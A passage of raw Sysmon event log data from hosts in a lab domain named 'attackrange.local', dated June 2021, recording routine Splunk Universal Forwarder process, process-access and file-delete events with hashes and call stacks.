Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AC1B94FEE88EBF5DA882C6135A9C194E,SHA256=04BD89301A4E399342476B42BD70F4BFB7E299EB38990DC67AB90B17E2E88418,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000149883Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:56.121{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=678B4A1BDEEDC0F2C168C265C831BA06,SHA256=CE2D8775BD62BDFAA1F7E613CC6B30A250F7FD1C291095868C582992AD7447F5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104544Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:43:57.998{54715871-FD3A-60C9-7600-00000000CF01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D417A46849F1592FCA006398B68D9228,SHA256=07D36516B3F424B71AA9F378FA95317ECEC19346B3125A7F0F8124E5CE9100AD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104543Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:43:57.997{54715871-FD3A-60C9-7600-00000000CF01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=147DEAB7CCF291E75BEA645D962E4C02,SHA256=A5D34DAE7649BFE805F8054126D753F8FF934EFFB7E677463A88B173DC71FB3B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000149885Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:57.236{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EFC4528FA73FED8078BFAA5CE9F952BB,SHA256=160AE77299BD0C7A6BD20A5C8893DE36E85C1167AE2BBE218CC72018C9017BD7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000104561Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:43:58.682{54715871-FD29-60C9-3700-00000000CF01}33683396C:\Windows\system32\conhost.exe{54715871-709E-60CA-1C13-00000000CF01}4852C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104560Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:43:58.680{54715871-FD18-60C9-0C00-00000000CF01}8486924C:\Windows\system32\svchost.exe{54715871-FD28-60C9-2B00-00000000CF01}3040C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104559Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:43:58.680{54715871-FD18-60C9-0C00-00000000CF01}8486924C:\Windows\system32\svchost.exe{54715871-FD28-60C9-2B00-00000000CF01}3040C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104558Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:43:58.679{54715871-FD18-60C9-0C00-00000000CF01}8486924C:\Windows\system32\svchost.exe{54715871-FD28-60C9-2B00-00000000CF01}3040C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104557Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:43:58.679{54715871-FD18-60C9-0C00-00000000CF01}8486924C:\Windows\system32\svchost.exe{54715871-FD28-60C9-2B00-00000000CF01}3040C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104556Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:43:58.679{54715871-FD16-60C9-0500-00000000CF01}408524C:\Windows\system32\csrss.exe{54715871-709E-60CA-1C13-00000000CF01}4852C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000104555Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:43:58.679{54715871-FD28-60C9-3000-00000000CF01}24483280C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{54715871-709E-60CA-1C13-00000000CF01}4852C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000104554Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:43:58.678{54715871-709E-60CA-1C13-00000000CF01}4852C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{54715871-FD16-60C9-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{54715871-FD28-60C9-3000-00000000CF01}2448C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000104553Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:43:58.179{54715871-709E-60CA-1B13-00000000CF01}71086992C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{54715871-FD28-60C9-3000-00000000CF01}2448C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104552Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:43:58.005{54715871-FD29-60C9-3700-00000000CF01}33683396C:\Windows\system32\conhost.exe{54715871-709E-60CA-1B13-00000000CF01}7108C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104551Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:43:58.002{54715871-FD18-60C9-0C00-00000000CF01}8486924C:\Windows\system32\svchost.exe{54715871-FD28-60C9-2B00-00000000CF01}3040C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104550Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:43:58.002{54715871-FD18-60C9-0C00-00000000CF01}8486924C:\Windows\system32\svchost.exe{54715871-FD28-60C9-2B00-00000000CF01}3040C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104549Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:43:58.001{54715871-FD18-60C9-0C00-00000000CF01}8486924C:\Windows\system32\svchost.exe{54715871-FD28-60C9-2B00-00000000CF01}3040C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104548Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:43:58.001{54715871-FD18-60C9-0C00-00000000CF01}8486924C:\Windows\system32\svchost.exe{54715871-FD28-60C9-2B00-00000000CF01}3040C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104547Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:43:58.001{54715871-FD16-60C9-0500-00000000CF01}408524C:\Windows\system32\csrss.exe{54715871-709E-60CA-1B13-00000000CF01}7108C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000104546Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:43:58.001{54715871-FD28-60C9-3000-00000000CF01}24483280C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{54715871-709E-60CA-1B13-00000000CF01}7108C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000104545Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:43:58.000{54715871-709E-60CA-1B13-00000000CF01}7108C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{54715871-FD16-60C9-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{54715871-FD28-60C9-3000-00000000CF01}2448C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000149887Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:58.249{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C0E1A8C1B8605518D649A997AA29BAAF,SHA256=6DBBE923BCD8707650F6C56E56A646404BB735597A603FC944947F629ACD7669,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000149886Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:58.069{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3BE79612CAE36FE0F285AA6F0191D140,SHA256=626190BB6741D7E4A1D68CC73CCA405F37773C7038D2477F1B588367EE7BC8A0,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000104571Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:43:59.508{54715871-709F-60CA-1D13-00000000CF01}68365920C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{54715871-FD28-60C9-3000-00000000CF01}2448C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104570Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:43:59.368{54715871-FD29-60C9-3700-00000000CF01}33683396C:\Windows\system32\conhost.exe{54715871-709F-60CA-1D13-00000000CF01}6836C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000104569Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:43:59.368{54715871-FD3A-60C9-7600-00000000CF01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B4D718B539780B7BA68760EFF9D016BF,SHA256=1463E217AD6833C179EDA41DDF92AA71872F90E8C25C73077204D98A8577D97D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000104568Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:43:59.366{54715871-FD18-60C9-0C00-00000000CF01}8486924C:\Windows\system32\svchost.exe{54715871-FD28-60C9-2B00-00000000CF01}3040C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104567Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:43:59.366{54715871-FD18-60C9-0C00-00000000CF01}8486924C:\Windows\system32\svchost.exe{54715871-FD28-60C9-2B00-00000000CF01}3040C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104566Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:43:59.366{54715871-FD18-60C9-0C00-00000000CF01}8486924C:\Windows\system32\svchost.exe{54715871-FD28-60C9-2B00-00000000CF01}3040C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104565Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:43:59.366{54715871-FD16-60C9-0500-00000000CF01}408424C:\Windows\system32\csrss.exe{54715871-709F-60CA-1D13-00000000CF01}6836C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000104564Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:43:59.365{54715871-FD18-60C9-0C00-00000000CF01}8486924C:\Windows\system32\svchost.exe{54715871-FD28-60C9-2B00-00000000CF01}3040C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104563Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:43:59.365{54715871-FD28-60C9-3000-00000000CF01}24483280C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{54715871-709F-60CA-1D13-00000000CF01}6836C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program 